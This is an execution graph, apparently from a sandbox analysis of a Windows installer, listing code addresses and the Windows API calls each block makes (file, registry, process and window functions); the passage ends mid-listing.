                                                        execution_graph 3396 401d41 GetDC GetDeviceCaps 3404 402ab3 3396->3404 3398 401d5f MulDiv ReleaseDC 3399 402ab3 18 API calls 3398->3399 3400 401d7e 3399->3400 3401 405d68 18 API calls 3400->3401 3402 401db7 CreateFontIndirectW 3401->3402 3403 4024e6 3402->3403 3405 405d68 18 API calls 3404->3405 3406 402ac7 3405->3406 3406->3398 3407 401a42 3408 402ab3 18 API calls 3407->3408 3409 401a48 3408->3409 3410 402ab3 18 API calls 3409->3410 3411 4019f0 3410->3411 3412 401cc6 3413 402ab3 18 API calls 3412->3413 3414 401cd9 SetWindowLongW 3413->3414 3415 40295d 3414->3415 3416 401dc7 3417 402ab3 18 API calls 3416->3417 3418 401dcd 3417->3418 3419 402ab3 18 API calls 3418->3419 3420 401dd6 3419->3420 3421 401de8 EnableWindow 3420->3421 3422 401ddd ShowWindow 3420->3422 3423 40295d 3421->3423 3422->3423 3424 401bca 3425 402ab3 18 API calls 3424->3425 3426 401bd1 3425->3426 3427 402ab3 18 API calls 3426->3427 3428 401bdb 3427->3428 3429 401beb 3428->3429 3431 402ad0 18 API calls 3428->3431 3430 401bfb 3429->3430 3432 402ad0 18 API calls 3429->3432 3433 401c06 3430->3433 3434 401c4a 3430->3434 3431->3429 3432->3430 3435 402ab3 18 API calls 3433->3435 3436 402ad0 18 API calls 3434->3436 3437 401c0b 3435->3437 3438 401c4f 3436->3438 3439 402ab3 18 API calls 3437->3439 3440 402ad0 18 API calls 3438->3440 3442 401c14 3439->3442 3441 401c58 FindWindowExW 3440->3441 3445 401c7a 3441->3445 3443 401c3a SendMessageW 3442->3443 3444 401c1c SendMessageTimeoutW 3442->3444 3443->3445 3444->3445 3446 4024ca 3447 402ad0 18 API calls 3446->3447 3448 4024d1 3447->3448 3451 4059cf GetFileAttributesW CreateFileW 3448->3451 3450 4024dd 3451->3450 3452 40194b 3453 402ab3 18 API calls 3452->3453 3454 401952 3453->3454 3455 402ab3 18 API calls 3454->3455 3456 40195c 3455->3456 3457 402ad0 18 API calls 3456->3457 3458 401965 3457->3458 3459 401979 lstrlenW 3458->3459 3461 4019b5 3458->3461 3460 401983 3459->3460 3460->3461 3465 405d46 lstrcpynW 3460->3465 3463 40199e 3463->3461 3464 4019ab lstrlenW 3463->3464 3464->3461 3465->3463 3466 40274b 3467 402ad0 18 API calls 3466->3467 3468 402759 3467->3468 3469 40276f 3468->3469 3470 402ad0 18 API calls 3468->3470 3471 4059aa 2 API calls 3469->3471 3470->3469 3472 402775 3471->3472 3492 4059cf GetFileAttributesW CreateFileW 3472->3492 3474 402782 3475 40282b 3474->3475 3476 40278e GlobalAlloc 3474->3476 3479 402833 DeleteFileW 3475->3479 3480 402846 3475->3480 3477 402822 CloseHandle 3476->3477 3478 4027a7 3476->3478 3477->3475 3493 403192 SetFilePointer 3478->3493 3479->3480 3482 4027ad 3483 403160 ReadFile 3482->3483 3484 4027b6 GlobalAlloc 3483->3484 3485 4027c6 3484->3485 3486 4027fa WriteFile GlobalFree 3484->3486 3487 402f38 33 API calls 3485->3487 3488 402f38 33 API calls 3486->3488 3491 4027d3 3487->3491 3489 40281f 3488->3489 3489->3477 3490 4027f1 GlobalFree 3490->3486 3491->3490 3492->3474 3493->3482 3497 40284c 3498 402ab3 18 API calls 3497->3498 3499 402852 3498->3499 3500 402875 3499->3500 3501 40288e 3499->3501 3507 402729 3499->3507 3502 40287a 3500->3502 3503 40288b 3500->3503 3504 4028a4 3501->3504 3505 402898 3501->3505 3511 405d46 lstrcpynW 3502->3511 3512 405c8d wsprintfW 3503->3512 3506 405d68 18 API calls 3504->3506 3508 402ab3 18 API calls 3505->3508 3506->3507 3508->3507 3511->3507 3512->3507 3513 40164d 3514 402ad0 18 API calls 3513->3514 3515 401653 3514->3515 3516 406089 2 API calls 3515->3516 3517 401659 3516->3517 3518 4019cf 3519 402ad0 18 API calls 3518->3519 3520 4019d6 3519->3520 3521 402ad0 18 API calls 3520->3521 3522 4019df 3521->3522 3523 4019e6 lstrcmpiW 3522->3523 3524 4019f8 lstrcmpW 3522->3524 3525 4019ec 3523->3525 3524->3525 2864 401e51 2865 402ad0 18 API calls 2864->2865 2866 401e57 2865->2866 2867 404ffa 25 API calls 2866->2867 2868 401e61 2867->2868 2882 4054c8 CreateProcessW 2868->2882 2871 401ec6 CloseHandle 2875 402729 2871->2875 2872 401e77 WaitForSingleObject 2873 401e89 2872->2873 2874 401e9b GetExitCodeProcess 2873->2874 2885 4060e9 2873->2885 2876 401eba 2874->2876 2877 401ead 2874->2877 2876->2871 2881 401eb8 2876->2881 2889 405c8d wsprintfW 2877->2889 2881->2871 2883 401e67 2882->2883 2884 4054f7 CloseHandle 2882->2884 2883->2871 2883->2872 2883->2875 2884->2883 2886 406106 PeekMessageW 2885->2886 2887 401e90 WaitForSingleObject 2886->2887 2888 4060fc DispatchMessageW 2886->2888 2887->2873 2888->2886 2889->2881 2890 402251 2891 40225f 2890->2891 2892 402259 2890->2892 2894 40226d 2891->2894 2895 402ad0 18 API calls 2891->2895 2893 402ad0 18 API calls 2892->2893 2893->2891 2896 40227b 2894->2896 2897 402ad0 18 API calls 2894->2897 2895->2894 2898 402ad0 18 API calls 2896->2898 2897->2896 2899 402284 WritePrivateProfileStringW 2898->2899 3526 4028d1 3527 402ab3 18 API calls 3526->3527 3528 4028d7 3527->3528 3529 40290a 3528->3529 3530 402729 3528->3530 3532 4028e5 3528->3532 3529->3530 3531 405d68 18 API calls 3529->3531 3531->3530 3532->3530 3534 405c8d wsprintfW 3532->3534 3534->3530 2900 401752 2901 402ad0 18 API calls 2900->2901 2902 401759 2901->2902 2903 401781 2902->2903 2904 401779 2902->2904 2961 405d46 lstrcpynW 2903->2961 2960 405d46 lstrcpynW 2904->2960 2907 40177f 2911 405fda 5 API calls 2907->2911 2908 40178c 2909 4057ae 3 API calls 2908->2909 2910 401792 lstrcatW 2909->2910 2910->2907 2933 40179e 2911->2933 2912 406089 2 API calls 2912->2933 2913 4059aa 2 API calls 2913->2933 2915 4017b0 CompareFileTime 2915->2933 2916 401870 2918 404ffa 25 API calls 2916->2918 2917 401847 2919 404ffa 25 API calls 2917->2919 2927 40185c 2917->2927 2920 40187a 2918->2920 2919->2927 2939 402f38 2920->2939 2923 4018a1 SetFileTime 2924 4018b3 CloseHandle 2923->2924 2926 4018c4 2924->2926 2924->2927 2925 405d68 18 API calls 2925->2933 2928 4018c9 2926->2928 2929 4018dc 2926->2929 2931 405d68 18 API calls 2928->2931 2932 405d68 18 API calls 2929->2932 2930 405d46 lstrcpynW 2930->2933 2934 4018d1 lstrcatW 2931->2934 2935 4018e4 2932->2935 2933->2912 2933->2913 2933->2915 2933->2916 2933->2917 2933->2925 2933->2930 2938 4059cf GetFileAttributesW CreateFileW 2933->2938 2962 405529 2933->2962 2934->2935 2937 405529 MessageBoxIndirectW 2935->2937 2937->2927 2938->2933 2941 402f53 2939->2941 2940 402f80 2966 403160 ReadFile 2940->2966 2941->2940 2968 403192 SetFilePointer 2941->2968 2945 4030f6 2947 4030fa 2945->2947 2948 403112 2945->2948 2946 402f9d GetTickCount 2952 40188d 2946->2952 2959 402fea 2946->2959 2949 403160 ReadFile 2947->2949 2951 403160 ReadFile 2948->2951 2948->2952 2953 40312d WriteFile 2948->2953 2949->2952 2950 403160 ReadFile 2950->2959 2951->2948 2952->2923 2952->2924 2953->2952 2954 403141 2953->2954 2954->2948 2954->2952 2955 403040 GetTickCount 2955->2959 2956 403065 MulDiv wsprintfW 2957 404ffa 25 API calls 2956->2957 2957->2959 2958 4030a9 WriteFile 2958->2952 2958->2959 2959->2950 2959->2952 2959->2955 2959->2956 2959->2958 2960->2907 2961->2908 2963 40553e 2962->2963 2964 40558a 2963->2964 2965 405552 MessageBoxIndirectW 2963->2965 2964->2933 2965->2964 2967 402f8b 2966->2967 2967->2945 2967->2946 2967->2952 2968->2940 3535 402452 3536 402bda 19 API calls 3535->3536 3537 40245c 3536->3537 3538 402ab3 18 API calls 3537->3538 3539 402465 3538->3539 3540 402489 RegEnumValueW 3539->3540 3541 40247d RegEnumKeyW 3539->3541 3543 402729 3539->3543 3542 4024a2 RegCloseKey 3540->3542 3540->3543 3541->3542 3542->3543 3545 4022d3 3546 402303 3545->3546 3547 4022d8 3545->3547 3549 402ad0 18 API calls 3546->3549 3548 402bda 19 API calls 3547->3548 3550 4022df 3548->3550 3551 40230a 3549->3551 3552 402ad0 18 API calls 3550->3552 3555 402320 3550->3555 3556 402b10 RegOpenKeyExW 3551->3556 3554 4022f0 RegDeleteValueW RegCloseKey 3552->3554 3554->3555 3559 402b3b 3556->3559 3564 402b87 3556->3564 3557 402b61 RegEnumKeyW 3558 402b73 RegCloseKey 3557->3558 3557->3559 3561 4060b0 3 API calls 3558->3561 3559->3557 3559->3558 3560 402b98 RegCloseKey 3559->3560 3562 402b10 3 API calls 3559->3562 3560->3564 3563 402b83 3561->3563 3562->3559 3563->3564 3565 402bb3 RegDeleteKeyW 3563->3565 3564->3555 3565->3564 3566 401ed4 3567 402ad0 18 API calls 3566->3567 3568 401edb 3567->3568 3569 406089 2 API calls 3568->3569 3570 401ee1 3569->3570 3571 401ef2 3570->3571 3573 405c8d wsprintfW 3570->3573 3573->3571 3574 4014d7 3575 402ab3 18 API calls 3574->3575 3576 4014dd Sleep 3575->3576 3578 40295d 3576->3578 3579 4036d8 3580 4036e3 3579->3580 3581 4036e7 3580->3581 3582 4036ea GlobalAlloc 3580->3582 3582->3581 3583 40155b 3584 402903 3583->3584 3587 405c8d wsprintfW 3584->3587 3586 402908 3587->3586 3588 4026dc 3589 4026db 3588->3589 3589->3588 3590 4026ec FindNextFileW 3589->3590 3592 4026f7 3589->3592 3591 40273e 3590->3591 3590->3592 3594 405d46 lstrcpynW 3591->3594 3594->3592 3085 4031dd #17 SetErrorMode OleInitialize 3086 4060b0 3 API calls 3085->3086 3087 403220 SHGetFileInfoW 3086->3087 3158 405d46 lstrcpynW 3087->3158 3089 40324b GetCommandLineW 3159 405d46 lstrcpynW 3089->3159 3091 40325d GetModuleHandleW 3092 403275 3091->3092 3093 4057db CharNextW 3092->3093 3094 403284 CharNextW 3093->3094 3105 403294 3094->3105 3095 403364 3096 403378 GetTempPathW 3095->3096 3160 4031a9 3096->3160 3098 403390 3100 403394 GetWindowsDirectoryW lstrcatW 3098->3100 3101 4033ea DeleteFileW 3098->3101 3099 4057db CharNextW 3099->3105 3103 4031a9 11 API calls 3100->3103 3168 402cff GetTickCount GetModuleFileNameW 3101->3168 3106 4033b0 3103->3106 3104 4033fe 3107 403496 3104->3107 3110 403486 3104->3110 3114 4057db CharNextW 3104->3114 3105->3095 3105->3099 3109 403366 3105->3109 3106->3101 3108 4033b4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3106->3108 3253 403640 3107->3253 3113 4031a9 11 API calls 3108->3113 3250 405d46 lstrcpynW 3109->3250 3196 40371a 3110->3196 3117 4033e2 3113->3117 3118 403419 3114->3118 3117->3101 3117->3107 3125 403460 3118->3125 3126 4034c5 lstrcatW lstrcmpiW 3118->3126 3119 4035a5 3121 403628 ExitProcess 3119->3121 3123 4060b0 3 API calls 3119->3123 3120 4034af 3122 405529 MessageBoxIndirectW 3120->3122 3127 4034bd ExitProcess 3122->3127 3128 4035b4 3123->3128 3129 4058b6 18 API calls 3125->3129 3126->3107 3130 4034e1 CreateDirectoryW SetCurrentDirectoryW 3126->3130 3131 4060b0 3 API calls 3128->3131 3132 40346c 3129->3132 3133 403504 3130->3133 3134 4034f9 3130->3134 3137 4035bd 3131->3137 3132->3107 3251 405d46 lstrcpynW 3132->3251 3261 405d46 lstrcpynW 3133->3261 3260 405d46 lstrcpynW 3134->3260 3139 4060b0 3 API calls 3137->3139 3141 4035c6 3139->3141 3140 40347b 3252 405d46 lstrcpynW 3140->3252 3144 403614 ExitWindowsEx 3141->3144 3149 4035d4 GetCurrentProcess 3141->3149 3143 405d68 18 API calls 3145 403543 DeleteFileW 3143->3145 3144->3121 3146 403621 3144->3146 3147 403550 CopyFileW 3145->3147 3155 403512 3145->3155 3262 40140b 3146->3262 3147->3155 3151 4035e4 3149->3151 3150 403599 3152 405be0 40 API calls 3150->3152 3151->3144 3152->3107 3153 405be0 40 API calls 3153->3155 3154 405d68 18 API calls 3154->3155 3155->3143 3155->3150 3155->3153 3155->3154 3156 4054c8 2 API calls 3155->3156 3157 403584 CloseHandle 3155->3157 3156->3155 3157->3155 3158->3089 3159->3091 3161 405fda 5 API calls 3160->3161 3162 4031b5 3161->3162 3163 4031bf 3162->3163 3164 4057ae 3 API calls 3162->3164 3163->3098 3165 4031c7 CreateDirectoryW 3164->3165 3265 4059fe 3165->3265 3269 4059cf GetFileAttributesW CreateFileW 3168->3269 3170 402d3f 3189 402d4f 3170->3189 3270 405d46 lstrcpynW 3170->3270 3172 402d65 3173 4057fa 2 API calls 3172->3173 3174 402d6b 3173->3174 3271 405d46 lstrcpynW 3174->3271 3176 402d76 GetFileSize 3177 402e72 3176->3177 3195 402d8d 3176->3195 3272 402c9b 3177->3272 3179 402e7b 3181 402eab GlobalAlloc 3179->3181 3179->3189 3283 403192 SetFilePointer 3179->3283 3180 403160 ReadFile 3180->3195 3284 403192 SetFilePointer 3181->3284 3183 402ede 3186 402c9b 6 API calls 3183->3186 3185 402ec6 3188 402f38 33 API calls 3185->3188 3186->3189 3187 402e94 3190 403160 ReadFile 3187->3190 3193 402ed2 3188->3193 3189->3104 3191 402e9f 3190->3191 3191->3181 3191->3189 3192 402c9b 6 API calls 3192->3195 3193->3189 3193->3193 3194 402f0f SetFilePointer 3193->3194 3194->3189 3195->3177 3195->3180 3195->3183 3195->3189 3195->3192 3197 4060b0 3 API calls 3196->3197 3198 40372e 3197->3198 3199 403734 3198->3199 3200 403746 3198->3200 3294 405c8d wsprintfW 3199->3294 3201 405c13 3 API calls 3200->3201 3202 403776 3201->3202 3204 403795 lstrcatW 3202->3204 3206 405c13 3 API calls 3202->3206 3205 403744 3204->3205 3285 4039f0 3205->3285 3206->3204 3209 4058b6 18 API calls 3210 4037c7 3209->3210 3211 40385b 3210->3211 3213 405c13 3 API calls 3210->3213 3212 4058b6 18 API calls 3211->3212 3214 403861 3212->3214 3215 4037f9 3213->3215 3216 403871 LoadImageW 3214->3216 3217 405d68 18 API calls 3214->3217 3215->3211 3221 40381a lstrlenW 3215->3221 3224 4057db CharNextW 3215->3224 3218 403917 3216->3218 3219 403898 RegisterClassW 3216->3219 3217->3216 3220 40140b 2 API calls 3218->3220 3222 4038ce SystemParametersInfoW CreateWindowExW 3219->3222 3249 403921 3219->3249 3223 40391d 3220->3223 3225 403828 lstrcmpiW 3221->3225 3226 40384e 3221->3226 3222->3218 3231 4039f0 19 API calls 3223->3231 3223->3249 3229 403817 3224->3229 3225->3226 3227 403838 GetFileAttributesW 3225->3227 3228 4057ae 3 API calls 3226->3228 3230 403844 3227->3230 3232 403854 3228->3232 3229->3221 3230->3226 3233 4057fa 2 API calls 3230->3233 3234 40392e 3231->3234 3295 405d46 lstrcpynW 3232->3295 3233->3226 3236 40393a ShowWindow LoadLibraryW 3234->3236 3237 4039bd 3234->3237 3239 403960 GetClassInfoW 3236->3239 3240 403959 LoadLibraryW 3236->3240 3238 4050cd 5 API calls 3237->3238 3241 4039c3 3238->3241 3242 403974 GetClassInfoW RegisterClassW 3239->3242 3243 40398a DialogBoxParamW 3239->3243 3240->3239 3244 4039c7 3241->3244 3245 4039df 3241->3245 3242->3243 3246 40140b 2 API calls 3243->3246 3248 40140b 2 API calls 3244->3248 3244->3249 3247 40140b 2 API calls 3245->3247 3246->3249 3247->3249 3248->3249 3249->3107 3250->3096 3251->3140 3252->3110 3254 403658 3253->3254 3255 40364a CloseHandle 3253->3255 3297 403685 3254->3297 3255->3254 3258 4055d5 71 API calls 3259 40349f OleUninitialize 3258->3259 3259->3119 3259->3120 3260->3133 3261->3155 3263 401389 2 API calls 3262->3263 3264 401420 3263->3264 3264->3121 3266 405a0b GetTickCount GetTempFileNameW 3265->3266 3267 405a41 3266->3267 3268 4031db 3266->3268 3267->3266 3267->3268 3268->3098 3269->3170 3270->3172 3271->3176 3273 402ca4 3272->3273 3274 402cbc 3272->3274 3275 402cb4 3273->3275 3276 402cad DestroyWindow 3273->3276 3277 402cc4 3274->3277 3278 402ccc GetTickCount 3274->3278 3275->3179 3276->3275 3279 4060e9 2 API calls 3277->3279 3280 402cda CreateDialogParamW ShowWindow 3278->3280 3281 402cfd 3278->3281 3282 402cca 3279->3282 3280->3281 3281->3179 3282->3179 3283->3187 3284->3185 3286 403a04 3285->3286 3296 405c8d wsprintfW 3286->3296 3288 403a75 3289 405d68 18 API calls 3288->3289 3290 403a81 SetWindowTextW 3289->3290 3291 4037a5 3290->3291 3292 403a9d 3290->3292 3291->3209 3292->3291 3293 405d68 18 API calls 3292->3293 3293->3292 3294->3205 3295->3211 3296->3288 3298 403693 3297->3298 3299 40365d 3298->3299 3300 403698 FreeLibrary GlobalFree 3298->3300 3299->3258 3300->3299 3300->3300 3374 4023de 3385 402bda 3374->3385 3376 4023e8 3377 402ad0 18 API calls 3376->3377 3378 4023f1 3377->3378 3379 402729 3378->3379 3380 4023fc RegQueryValueExW 3378->3380 3381 40241c 3380->3381 3384 402422 RegCloseKey 3380->3384 3381->3384 3389 405c8d wsprintfW 3381->3389 3384->3379 3386 402ad0 18 API calls 3385->3386 3387 402bf3 3386->3387 3388 402c01 RegOpenKeyExW 3387->3388 3388->3376 3389->3384 3595 40165e 3596 402ad0 18 API calls 3595->3596 3597 401665 3596->3597 3598 402ad0 18 API calls 3597->3598 3599 40166e 3598->3599 3600 402ad0 18 API calls 3599->3600 3601 401677 MoveFileW 3600->3601 3602 401683 3601->3602 3603 40168a 3601->3603 3605 401423 25 API calls 3602->3605 3604 406089 2 API calls 3603->3604 3607 402195 3603->3607 3606 401699 3604->3606 3605->3607 3606->3607 3608 405be0 40 API calls 3606->3608 3608->3602 3609 4040e3 lstrlenW 3610 404102 3609->3610 3611 404104 WideCharToMultiByte 3609->3611 3610->3611 3612 401ce5 GetDlgItem GetClientRect 3613 402ad0 18 API calls 3612->3613 3614 401d17 LoadImageW SendMessageW 3613->3614 3615 401d35 DeleteObject 3614->3615 3616 40295d 3614->3616 3615->3616 3617 4043e9 3618 4043f9 3617->3618 3619 40441f 3617->3619 3621 403f95 19 API calls 3618->3621 3620 403ffc 8 API calls 3619->3620 3622 40442b 3620->3622 3623 404406 SetDlgItemTextW 3621->3623 3623->3619 3624 40206a 3625 402ad0 18 API calls 3624->3625 3626 402071 3625->3626 3627 402ad0 18 API calls 3626->3627 3628 40207b 3627->3628 3629 402ad0 18 API calls 3628->3629 3630 402084 3629->3630 3631 402ad0 18 API calls 3630->3631 3632 40208e 3631->3632 3633 402ad0 18 API calls 3632->3633 3634 402098 3633->3634 3635 4020ac CoCreateInstance 3634->3635 3636 402ad0 18 API calls 3634->3636 3639 4020cb 3635->3639 3636->3635 3637 401423 25 API calls 3638 402195 3637->3638 3639->3637 3639->3638 3640 40156b 3641 401584 3640->3641 3642 40157b ShowWindow 3640->3642 3643 401592 ShowWindow 3641->3643 3644 40295d 3641->3644 3642->3641 3643->3644 3645 4024ec 3646 4024f1 3645->3646 3647 40250a 3645->3647 3648 402ab3 18 API calls 3646->3648 3649 402510 3647->3649 3650 40253c 3647->3650 3651 4024f8 3648->3651 3652 402ad0 18 API calls 3649->3652 3653 402ad0 18 API calls 3650->3653 3656 402565 WriteFile 3651->3656 3657 402729 3651->3657 3654 402517 WideCharToMultiByte lstrlenA 3652->3654 3655 402543 lstrlenW 3653->3655 3654->3651 3655->3651 3656->3657 3658 404f6e 3659 404f92 3658->3659 3660 404f7e 3658->3660 3663 404f9a IsWindowVisible 3659->3663 3669 404fb1 3659->3669 3661 404f84 3660->3661 3662 404fdb 3660->3662 3665 403fe1 SendMessageW 3661->3665 3664 404fe0 CallWindowProcW 3662->3664 3663->3662 3666 404fa7 3663->3666 3667 404f8e 3664->3667 3665->3667 3671 4048c4 SendMessageW 3666->3671 3669->3664 3676 404944 3669->3676 3672 404923 SendMessageW 3671->3672 3673 4048e7 GetMessagePos ScreenToClient SendMessageW 3671->3673 3675 40491b 3672->3675 3674 404920 3673->3674 3673->3675 3674->3672 3675->3669 3685 405d46 lstrcpynW 3676->3685 3678 404957 3686 405c8d wsprintfW 3678->3686 3680 404961 3681 40140b 2 API calls 3680->3681 3682 40496a 3681->3682 3687 405d46 lstrcpynW 3682->3687 3684 404971 3684->3662 3685->3678 3686->3680 3687->3684 3688 4018ef 3689 401926 3688->3689 3690 402ad0 18 API calls 3689->3690 3691 40192b 3690->3691 3692 4055d5 71 API calls 3691->3692 3693 401934 3692->3693 3694 402571 3695 402ab3 18 API calls 3694->3695 3699 40257a 3695->3699 3696 4025c1 ReadFile 3696->3699 3704 402642 3696->3704 3697 4025fe ReadFile 3697->3699 3697->3704 3698 4025de MultiByteToWideChar 3698->3699 3699->3696 3699->3697 3699->3698 3700 402644 3699->3700 3701 402655 3699->3701 3699->3704 3705 405c8d wsprintfW 3700->3705 3703 402671 SetFilePointer 3701->3703 3701->3704 3703->3704 3705->3704 3706 4014f1 SetForegroundWindow 3707 40295d 3706->3707 3708 4018f2 3709 402ad0 18 API calls 3708->3709 3710 4018f9 3709->3710 3711 405529 MessageBoxIndirectW 3710->3711 3712 401902 3711->3712 3713 401df3 3714 402ad0 18 API calls 3713->3714 3715 401df9 3714->3715 3716 402ad0 18 API calls 3715->3716 3717 401e02 3716->3717 3718 402ad0 18 API calls 3717->3718 3719 401e0b 3718->3719 3720 402ad0 18 API calls 3719->3720 3721 401e14 3720->3721 3722 401423 25 API calls 3721->3722 3723 401e1b ShellExecuteW 3722->3723 3724 401e4c 3723->3724 3730 404976 GetDlgItem GetDlgItem 3731 4049c8 7 API calls 3730->3731 3740 404be1 3730->3740 3732 404a6b DeleteObject 3731->3732 3733 404a5e SendMessageW 3731->3733 3734 404a74 3732->3734 3733->3732 3735 404aab 3734->3735 3739 405d68 18 API calls 3734->3739 3737 403f95 19 API calls 3735->3737 3736 404cc5 3738 404d71 3736->3738 3748 404d1e SendMessageW 3736->3748 3769 404bd4 3736->3769 3741 404abf 3737->3741 3742 404d83 3738->3742 3743 404d7b SendMessageW 3738->3743 3744 404a8d SendMessageW SendMessageW 3739->3744 3740->3736 3746 4048c4 5 API calls 3740->3746 3773 404c52 3740->3773 3747 403f95 19 API calls 3741->3747 3745 404dac 3742->3745 3751 404d95 ImageList_Destroy 3742->3751 3752 404d9c 3742->3752 3743->3742 3744->3734 3754 404f1b 3745->3754 3772 404944 4 API calls 3745->3772 3777 404de7 3745->3777 3746->3773 3753 404acd 3747->3753 3755 404d33 SendMessageW 3748->3755 3748->3769 3749 403ffc 8 API calls 3756 404f67 3749->3756 3750 404cb7 SendMessageW 3750->3736 3751->3752 3752->3745 3757 404da5 GlobalFree 3752->3757 3758 404ba2 GetWindowLongW SetWindowLongW 3753->3758 3766 404b1d SendMessageW 3753->3766 3768 404b9c 3753->3768 3770 404b59 SendMessageW 3753->3770 3771 404b6a SendMessageW 3753->3771 3759 404f2d ShowWindow GetDlgItem ShowWindow 3754->3759 3754->3769 3763 404d46 3755->3763 3757->3745 3760 404bbb 3758->3760 3759->3769 3761 404bc1 ShowWindow 3760->3761 3762 404bd9 3760->3762 3781 403fca SendMessageW 3761->3781 3782 403fca SendMessageW 3762->3782 3767 404d57 SendMessageW 3763->3767 3766->3753 3767->3738 3768->3758 3768->3760 3769->3749 3770->3753 3771->3753 3772->3777 3773->3736 3773->3750 3774 404ef1 InvalidateRect 3774->3754 3775 404f07 3774->3775 3783 4047de 3775->3783 3776 404e15 SendMessageW 3780 404e2b 3776->3780 3777->3776 3777->3780 3779 404e9f SendMessageW SendMessageW 3779->3780 3780->3774 3780->3779 3781->3769 3782->3740 3784 4047fb 3783->3784 3785 405d68 18 API calls 3784->3785 3786 404830 3785->3786 3787 405d68 18 API calls 3786->3787 3788 40483b 3787->3788 3789 405d68 18 API calls 3788->3789 3790 40486c lstrlenW wsprintfW SetDlgItemTextW 3789->3790 3790->3754 3791 404778 3792 4047a4 3791->3792 3793 404788 3791->3793 3795 4047d7 3792->3795 3796 4047aa SHGetPathFromIDListW 3792->3796 3802 40550d GetDlgItemTextW 3793->3802 3798 4047c1 SendMessageW 3796->3798 3799 4047ba 3796->3799 3797 404795 SendMessageW 3797->3792 3798->3795 3800 40140b 2 API calls 3799->3800 3800->3798 3802->3797 3803 4014ff 3804 401507 3803->3804 3806 40151a 3803->3806 3805 402ab3 18 API calls 3804->3805 3805->3806 3807 401000 3808 401037 BeginPaint GetClientRect 3807->3808 3809 40100c DefWindowProcW 3807->3809 3811 4010f3 3808->3811 3812 401179 3809->3812 3813 401073 CreateBrushIndirect FillRect DeleteObject 3811->3813 3814 4010fc 3811->3814 3813->3811 3815 401102 CreateFontIndirectW 3814->3815 3816 401167 EndPaint 3814->3816 3815->3816 3817 401112 6 API calls 3815->3817 3816->3812 3817->3816 3818 401a00 3819 402ad0 18 API calls 3818->3819 3820 401a09 ExpandEnvironmentStringsW 3819->3820 3821 401a1d 3820->3821 3823 401a30 3820->3823 3822 401a22 lstrcmpW 3821->3822 3821->3823 3822->3823 3824 401b01 3825 402ad0 18 API calls 3824->3825 3826 401b08 3825->3826 3827 402ab3 18 API calls 3826->3827 3828 401b11 wsprintfW 3827->3828 3829 40295d 3828->3829 3830 402706 3831 402ad0 18 API calls 3830->3831 3832 40270d FindFirstFileW 3831->3832 3833 402720 3832->3833 3834 402735 3832->3834 3838 405c8d wsprintfW 3834->3838 3836 40273e 3839 405d46 lstrcpynW 3836->3839 3838->3836 3839->3833 2852 401f08 2853 402ad0 18 API calls 2852->2853 2854 401f0f GetFileVersionInfoSizeW 2853->2854 2855 401f36 GlobalAlloc 2854->2855 2856 40295d 2854->2856 2855->2856 2857 401f4a 2855->2857 2858 401f8c 2857->2858 2862 405c8d wsprintfW 2857->2862 2858->2856 2860 401f7e 2863 405c8d wsprintfW 2860->2863 2862->2860 2863->2858 3840 401c8e 3841 402ab3 18 API calls 3840->3841 3842 401c94 IsWindow 3841->3842 3843 4019f0 3842->3843 3844 40268f 3845 402696 3844->3845 3848 402908 3844->3848 3846 402ab3 18 API calls 3845->3846 3847 4026a1 3846->3847 3849 4026a8 SetFilePointer 3847->3849 3849->3848 3850 4026b8 3849->3850 3852 405c8d wsprintfW 3850->3852 3852->3848 3853 401491 3854 404ffa 25 API calls 3853->3854 3855 401498 3854->3855 2969 402293 2970 402ad0 18 API calls 2969->2970 2971 4022a2 2970->2971 2972 402ad0 18 API calls 2971->2972 2973 4022ab 2972->2973 2974 402ad0 18 API calls 2973->2974 2975 4022b5 GetPrivateProfileStringW 2974->2975 3856 402c15 3857 402c40 3856->3857 3858 402c27 SetTimer 3856->3858 3859 402c95 3857->3859 3860 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3857->3860 3858->3857 3860->3859 3861 401718 3862 402ad0 18 API calls 3861->3862 3863 40171f SearchPathW 3862->3863 3864 40173a 3863->3864 3865 401f98 3866 40205c 3865->3866 3867 401faa 3865->3867 3870 401423 25 API calls 3866->3870 3868 402ad0 18 API calls 3867->3868 3869 401fb1 3868->3869 3871 402ad0 18 API calls 3869->3871 3876 402195 3870->3876 3872 401fba 3871->3872 3873 401fd0 LoadLibraryExW 3872->3873 3874 401fc2 GetModuleHandleW 3872->3874 3873->3866 3875 401fe1 3873->3875 3874->3873 3874->3875 3885 40611c WideCharToMultiByte 3875->3885 3879 401ff2 3882 401423 25 API calls 3879->3882 3883 402002 3879->3883 3880 40202b 3881 404ffa 25 API calls 3880->3881 3881->3883 3882->3883 3883->3876 3884 40204e FreeLibrary 3883->3884 3884->3876 3886 406146 GetProcAddress 3885->3886 3887 401fec 3885->3887 3886->3887 3887->3879 3887->3880 3081 40159b 3082 402ad0 18 API calls 3081->3082 3083 4015a2 SetFileAttributesW 3082->3083 3084 4015b4 3083->3084 3888 40149e 3889 40223c 3888->3889 3890 4014ac PostQuitMessage 3888->3890 3890->3889 3891 40219e 3892 402ad0 18 API calls 3891->3892 3893 4021a4 3892->3893 3894 402ad0 18 API calls 3893->3894 3895 4021ad 3894->3895 3896 402ad0 18 API calls 3895->3896 3897 4021b6 3896->3897 3898 406089 2 API calls 3897->3898 3899 4021bf 3898->3899 3900 4021d0 lstrlenW lstrlenW 3899->3900 3901 4021c3 3899->3901 3903 404ffa 25 API calls 3900->3903 3902 404ffa 25 API calls 3901->3902 3905 4021cb 3901->3905 3902->3905 3904 40220e SHFileOperationW 3903->3904 3904->3901 3904->3905 3906 401b22 3907 401b73 3906->3907 3908 401b2f 3906->3908 3910 401b78 3907->3910 3911 401b9d GlobalAlloc 3907->3911 3909 402229 3908->3909 3915 401b46 3908->3915 3912 405d68 18 API calls 3909->3912 3921 401bb8 3910->3921 3927 405d46 lstrcpynW 3910->3927 3913 405d68 18 API calls 3911->3913 3914 402236 3912->3914 3913->3921 3920 405529 MessageBoxIndirectW 3914->3920 3925 405d46 lstrcpynW 3915->3925 3918 401b8a GlobalFree 3918->3921 3919 401b55 3926 405d46 lstrcpynW 3919->3926 3920->3921 3923 401b64 3928 405d46 lstrcpynW 3923->3928 3925->3919 3926->3923 3927->3918 3928->3921 3929 402222 3930 402229 3929->3930 3932 40223c 3929->3932 3931 405d68 18 API calls 3930->3931 3933 402236 3931->3933 3934 405529 MessageBoxIndirectW 3933->3934 3934->3932 2665 401924 2666 401926 2665->2666 2671 402ad0 2666->2671 2672 402adc 2671->2672 2718 405d68 2672->2718 2675 40192b 2677 4055d5 2675->2677 2757 4058b6 2677->2757 2680 405614 